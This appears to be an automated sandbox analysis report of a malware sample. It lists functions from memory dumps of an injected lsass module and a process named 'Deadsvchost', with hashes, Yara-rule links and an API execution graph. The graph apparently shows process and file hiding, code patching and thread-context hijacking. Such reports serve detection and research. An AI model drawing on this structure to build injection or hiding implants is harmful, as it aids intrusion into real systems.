                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: 2f4c2c8d9dd4a6012bdb5abda99d943372c89785e9b581c845ab5935f0465f97
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: B0519E222087C1C1F6749E25A6EC3AE6761F395780F460027DFE903B9ADA7DC52C9B50
                                                        Function 00000202C0AF0724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: b8b524b5fe783d67d5983f375c2dc6a45dc5e905a3e8289228bac1d50de3bbab
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 33418F33215B44C5EB609F26E88C7AE67A1F798794F424027EF4E87799DB39C449CB80
                                                        Function 00000202C0AED7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 59099710c9d0f1b4dd14af3ece67d82f0715fec4563d1d43b27d9008531ad6ec
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 90110836608BC0C6EB60CB16B48829AB7A5F7C9B84F544127EFDD83B5ACF38C4548B04
                                                        Function 00000202C0AE95F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: a8f766778e052431c9a5ee78e48b909219ac05c3f8b6ede592f7d048be5d9e85
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 9D11FB32618B80C2EB218F15E48825DB7A5F788B94F194222EF9D07765DF39C5558704
                                                        Function 00000202C0AED77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: c53597e9f4568b1c293677c340c8b83d66163b3803097d7e19397ed64a21cc46
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 5FF08227308B80C2FB049B51F4CC69D3260AB48B90F465127EB9917B96CF39C45DC704
                                                        Function 00000202C0AED728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00000202C0AED751
                                                        • TlsSetValue.KERNEL32(?,?,?,00000202C0AEB50E,?,?,?,00000202C0AEB969,?,?,?,?,00000202C0AEBA1D), ref: 00000202C0AED768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 5dcba3befec19a3cabe185201543e8944ea2019330c246110f2bf2d11dbd80ca
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 4CE06D63604740D2FB444B60F8CC2EC3262AB88780F5A8127EB650A2D6DF39C85DC204
                                                        Function 00000202C0AE1C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: 2e20f8dc9fcf14b6a4866c56fb94d75584ad51f9c336a833ae30503458a3a020
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 5D11A322605B90C1EF158B66944C15DA7A0FBC8FA0F5A4316DFA993795EF38C056C340
                                                        Function 00000202C0AE1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: bf404a17543ca586d83c88378db0c96524e570c7edb6a69ba4fade01f97d1998
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: EBE03933602700C6FB448B62D84C34937E1EB88B05F0681268A0907351DF7E849D8740
                                                        Function 00000202C0AE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 873c895c39330efbd9b5372d86ee0aee996f3dd3da2caae253372b61916a57b1
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 23E0E573612B40C6FB489B62D84C25D77A1FB88B15F4A8126CA0907321EF3A849D8A14

                                                        Executed Functions

                                                        Function 00007FFD9B800E79 Relevance: .7, Instructions: 734COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90fa4b7412eb4874b2824776d3ce673f5d841b6d6eec3cb1cc2950dc262932f4
                                                        • Instruction ID: a400b1c4068c281f2c1ffca2603c4a9a683fe8240c08165f0053dcfcc0dd1b16
                                                        • Opcode Fuzzy Hash: 90fa4b7412eb4874b2824776d3ce673f5d841b6d6eec3cb1cc2950dc262932f4
                                                        • Instruction Fuzzy Hash: F932D470B29A494FEB98FB6C8465BBD77D2FF98340F5505B9E04EC36D6CE28A8018741
                                                        Function 00007FFD9B801799 Relevance: .2, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 86c53da2be52f4eae78e82b8da5c1c23f5fd5baf92155bc143027130e34b3853
                                                        • Instruction ID: 79d6d97c6207ab69a76d253d3e910e3a48c138aa87d2b6414e75e811efff7fc9
                                                        • Opcode Fuzzy Hash: 86c53da2be52f4eae78e82b8da5c1c23f5fd5baf92155bc143027130e34b3853
                                                        • Instruction Fuzzy Hash: 76510E20B1E6C94FD79AAB7848746A5BBD5DF9B229B0804FBE0CDC71E7DD181806C342
                                                        Function 00007FFD9B800BFE Relevance: .3, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bca526c0481f0936471e80356202e1e996345da11892c54b83a26d7767c3654
                                                        • Instruction ID: 562dfec250eb9571e053afab3d6cd7712c67170d113432ecf6b76c3585c6491b
                                                        • Opcode Fuzzy Hash: 8bca526c0481f0936471e80356202e1e996345da11892c54b83a26d7767c3654
                                                        • Instruction Fuzzy Hash: C3714C21B1D98E0FE795EB7C98665F97BE1EF89250B4501BAD48DC32E7CD186C028351
                                                        Function 00007FFD9B8004C8 Relevance: .1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a6844937f79e3af8ab68a591a8eb94fd9497a1b9e75701d9f7680876df81683
                                                        • Instruction ID: c5804d539e60bc4d4f99eae42c39b3bdc2c859b6a9a863f1f028b1dd6898b8c0
                                                        • Opcode Fuzzy Hash: 7a6844937f79e3af8ab68a591a8eb94fd9497a1b9e75701d9f7680876df81683
                                                        • Instruction Fuzzy Hash: 6231AF21B1C9490FE798AF2C946A6B9A2C2EF9D355F0505BEF05EC32E7DD64AC428341
                                                        Function 00007FFD9B800A91 Relevance: .1, Instructions: 126COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5d9762e758a8f033b946a23a9dc2237ed17e0c2554d5476e4018a479d554f65
                                                        • Instruction ID: 343df25d87e098fce3cfcdeb30e919c46a3b2dd8ee1ea8beb9d14072ac734ffe
                                                        • Opcode Fuzzy Hash: c5d9762e758a8f033b946a23a9dc2237ed17e0c2554d5476e4018a479d554f65
                                                        • Instruction Fuzzy Hash: 20310511F2894D0BE744BBBC58697BD77D2EF98745F4542B6E04CC32D7DE1869018382
                                                        Function 00007FFD9B800949 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52982791e87e58d885efd082342824c9cb6e503ee0820ee36b560fec86a63ebf
                                                        • Instruction ID: a63f1f8fa6baa3913b5eb8e3aa30b9d1be78b7b0316196f7a464ee241db7827f
                                                        • Opcode Fuzzy Hash: 52982791e87e58d885efd082342824c9cb6e503ee0820ee36b560fec86a63ebf
                                                        • Instruction Fuzzy Hash: A731A234B18A8E4FEB44EBA8D465AED77B1FF98300F9105B9D059D37C6CE3869018741
                                                        Function 00007FFD9B801951 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f6b9c2daa32f2bc37a2e292b84a2d345c16b48a40c55fd853cf982164fc06bc
                                                        • Instruction ID: 35b043863c336b3e86162ea59719a717812d068ed4903f58a3c9845cc0e9d54c
                                                        • Opcode Fuzzy Hash: 4f6b9c2daa32f2bc37a2e292b84a2d345c16b48a40c55fd853cf982164fc06bc
                                                        • Instruction Fuzzy Hash: 87012B15A0DBC90FE356AB3858655B17FE0CF96650B4905FBF4C8C61B7DD085B458382

                                                        Non-executed Functions

                                                        Function 00007FFD9B800718 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: <L_^$L_^ $L_^"$L_^$
                                                        • API String ID: 0-2284102284
                                                        • Opcode ID: b5eac7b7e00d5c8b2b4e455dc4c3ea8584c1fb386b09fe0445e96585bea04802
                                                        • Instruction ID: 11470d43fdc9f0b8318c3556e47717c5f25c674aa8435f1681cc6bc7b1144d01
                                                        • Opcode Fuzzy Hash: b5eac7b7e00d5c8b2b4e455dc4c3ea8584c1fb386b09fe0445e96585bea04802
                                                        • Instruction Fuzzy Hash: 37515777B0E6DA0FD355AB6CA8B15EC3BA0EF8125875680F2C0DC8A7D7DD28240B8641

                                                        Execution Graph

                                                        Execution Coverage:0.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1090
                                                        Total number of Limit Nodes:2
                                                        execution_graph 6760 2a661302118 6761 2a661302149 6760->6761 6762 2a66130226e 6761->6762 6768 2a661302239 6761->6768 6769 2a66130216c 6761->6769 6763 2a6613022e8 6762->6763 6764 2a661302279 6762->6764 6766 2a6613031c0 11 API calls 6763->6766 6763->6768 6777 2a6613031c0 GetProcessHeap HeapAlloc 6764->6777 6766->6768 6767 2a6613021b4 StrCmpNIW 6767->6769 6769->6767 6769->6768 6771 2a661301c28 6769->6771 6772 2a661301c5a GetProcessHeap HeapAlloc 6771->6772 6773 2a661301cb4 6771->6773 6772->6773 6774 2a661301c92 6772->6774 6773->6769 6783 2a661301bf4 6774->6783 6782 2a661303213 6777->6782 6778 2a6613032dd GetProcessHeap HeapFree 6778->6768 6779 2a6613032d8 6779->6778 6780 2a66130326a StrCmpNIW 6780->6782 6781 2a661301c28 6 API calls 6781->6782 6782->6778 6782->6779 6782->6780 6782->6781 6784 2a661301c0b 6783->6784 6785 2a661301c14 GetProcessHeap HeapFree 6783->6785 6786 2a66130152c 2 API calls 6784->6786 6785->6773 6786->6785 7525 2a661302618 7526 2a661302699 _invalid_parameter_noinfo 7525->7526 7527 2a6613026fe GetFileType 7526->7527 7539 2a66130288f 7526->7539 7528 2a66130270c StrCpyW 7527->7528 7529 2a661302722 7527->7529 7530 2a661302731 7528->7530 7541 2a6613019d8 GetFinalPathNameByHandleW 7529->7541 7532 2a66130273b 7530->7532 7537 2a6613027e0 7530->7537 7533 2a661303c70 StrCmpNIW 7532->7533 7532->7539 7546 2a66130330c StrCmpIW 7532->7546 7550 2a661301cd4 7532->7550 7533->7532 7534 2a661303c70 StrCmpNIW 7534->7537 7537->7534 7538 2a66130330c 4 API calls 7537->7538 7537->7539 7540 2a661301cd4 2 API calls 7537->7540 7538->7537 7540->7537 7542 2a661301a41 7541->7542 7543 2a661301a02 StrCmpNIW 7541->7543 7542->7530 7543->7542 7544 2a661301a1c lstrlenW 7543->7544 7544->7542 7545 2a661301a2e StrCpyW 7544->7545 7545->7542 7547 2a66130333e StrCpyW StrCatW 7546->7547 7548 2a661303355 PathCombineW 7546->7548 7549 2a66130335e 7547->7549 7548->7549 7549->7532 7551 2a661301ceb 7550->7551 7552 2a661301cf4 7550->7552 7553 2a66130152c 2 API calls 7551->7553 7552->7532 7553->7552 6787 2a66130d11c GetCommandLineA GetCommandLineW 7372 2a661302fa0 7373 2a661302fc7 7372->7373 7374 2a661303094 7373->7374 7375 2a661302fe4 PdhGetCounterInfoW 7373->7375 7375->7374 7376 2a661303006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 7375->7376 7377 2a661303038 StrCmpW 7376->7377 7378 2a661303080 GetProcessHeap HeapFree 7376->7378 7377->7378 7380 2a66130304d 7377->7380 7378->7374 7380->7378 7381 2a661303558 StrCmpNW 7380->7381 7382 2a661303586 StrStrW 7381->7382 7385 2a6613035f6 7381->7385 7383 2a66130359f StrToIntW 7382->7383 7382->7385 7384 2a6613035c7 7383->7384 7383->7385 7384->7385 7391 2a661301934 OpenProcess 7384->7391 7385->7380 7388 2a661303c70 StrCmpNIW 7389 2a6613035e8 7388->7389 7389->7385 7390 2a661301bf4 2 API calls 7389->7390 7390->7385 7392 2a661301968 K32GetModuleFileNameExW 7391->7392 7393 2a6613019ba 7391->7393 7394 2a6613019b1 CloseHandle 7392->7394 7395 2a661301982 PathFindFileNameW lstrlenW 7392->7395 7393->7385 7393->7388 7394->7393 7395->7394 7396 2a6613019a0 StrCpyW 7395->7396 7396->7394 7916 2a661311ca0 7917 2a661311cb7 7916->7917 7918 2a661311cb1 CloseHandle 7916->7918 7918->7917 7554 2a661302408 7555 2a661302484 _invalid_parameter_noinfo 7554->7555 7556 2a6613024ea GetFileType 7555->7556 7563 2a6613025c3 7555->7563 7557 2a6613024f8 StrCpyW 7556->7557 7558 2a66130250c 7556->7558 7560 2a661302519 7557->7560 7559 2a6613019d8 4 API calls 7558->7559 7559->7560 7561 2a661303c70 StrCmpNIW 7560->7561 7562 2a66130330c 4 API calls 7560->7562 7560->7563 7564 2a661301cd4 2 API calls 7560->7564 7561->7560 7562->7560 7564->7560 7919 2a66130a688 7920 2a66130a6a1 7919->7920 7929 2a66130a69d 7919->7929 7921 2a66130cd58 43 API calls 7920->7921 7922 2a66130a6a6 7921->7922 7931 2a66130d250 GetEnvironmentStringsW 7922->7931 7925 2a66130a6b3 7928 2a66130b9f8 __free_lconv_num 13 API calls 7925->7928 7928->7929 7930 2a66130b9f8 __free_lconv_num 13 API calls 7930->7925 7932 2a66130d27e 7931->7932 7942 2a66130d320 7931->7942 7935 2a66130d1a0 WideCharToMultiByte 7932->7935 7933 2a66130d32a FreeEnvironmentStringsW 7934 2a66130a6ab 7933->7934 7934->7925 7943 2a66130a6f4 7934->7943 7936 2a66130d2d0 7935->7936 7937 2a66130af2c 14 API calls 7936->7937 7936->7942 7938 2a66130d2df 7937->7938 7939 2a66130d309 7938->7939 7940 2a66130d1a0 WideCharToMultiByte 7938->7940 7941 2a66130b9f8 __free_lconv_num 13 API calls 7939->7941 7940->7939 7941->7942 7942->7933 7942->7934 7944 2a66130a71b 7943->7944 7945 2a66130b980 _set_errno_from_matherr 13 API calls 7944->7945 7955 2a66130a750 7945->7955 7946 2a66130a7bf 7947 2a66130b9f8 __free_lconv_num 13 API calls 7946->7947 7948 2a66130a6c0 7947->7948 7948->7930 7949 2a66130b980 _set_errno_from_matherr 13 API calls 7949->7955 7950 2a66130a7b0 7960 2a66130a7fc 7950->7960 7951 2a66130ac54 __std_exception_copy 30 API calls 7951->7955 7954 2a66130a7e7 7957 2a66130b860 _invalid_parameter_noinfo 17 API calls 7954->7957 7955->7946 7955->7949 7955->7950 7955->7951 7955->7954 7958 2a66130b9f8 __free_lconv_num 13 API calls 7955->7958 7956 2a66130b9f8 __free_lconv_num 13 API calls 7956->7946 7959 2a66130a7f9 7957->7959 7958->7955 7964 2a66130a801 7960->7964 7965 2a66130a7b8 7960->7965 7961 2a66130a82a 7963 2a66130b9f8 __free_lconv_num 13 API calls 7961->7963 7962 2a66130b9f8 __free_lconv_num 13 API calls 7962->7964 7963->7965 7964->7961 7964->7962 7965->7956 7565 2a66130e408 7566 2a66130e413 7565->7566 7574 2a661310c64 7566->7574 7587 2a66130aebc EnterCriticalSection 7574->7587 6788 2a661306110 6789 2a66130611d 6788->6789 6790 2a66130623a 6789->6790 6791 2a661306129 6789->6791 6794 2a66130631e 6790->6794 6795 2a661306261 VirtualProtect FlushInstructionCache 6790->6795 6792 2a6613061ad 6791->6792 6793 2a661306186 SetThreadContext 6791->6793 6793->6792 6796 2a66130633e 6794->6796 6804 2a661304800 6794->6804 6795->6790 6808 2a661305210 GetCurrentProcess 6796->6808 6799 2a661306397 6812 2a661307d60 6799->6812 6800 2a661306357 ResumeThread 6801 2a661306343 6800->6801 6801->6799 6801->6800 6806 2a66130481c 6804->6806 6805 2a66130487f 6805->6796 6806->6805 6807 2a661304832 VirtualFree 6806->6807 6807->6806 6809 2a66130522c 6808->6809 6810 2a661305242 VirtualProtect FlushInstructionCache 6809->6810 6811 2a661305273 6809->6811 6810->6809 6811->6801 6813 2a661307d69 6812->6813 6814 2a6613063df 6813->6814 6815 2a66130854c IsProcessorFeaturePresent 6813->6815 6816 2a661308564 6815->6816 6821 2a661308740 RtlCaptureContext 6816->6821 6822 2a66130875a RtlLookupFunctionEntry 6821->6822 6823 2a661308577 6822->6823 6824 2a661308770 RtlVirtualUnwind 6822->6824 6825 2a661308518 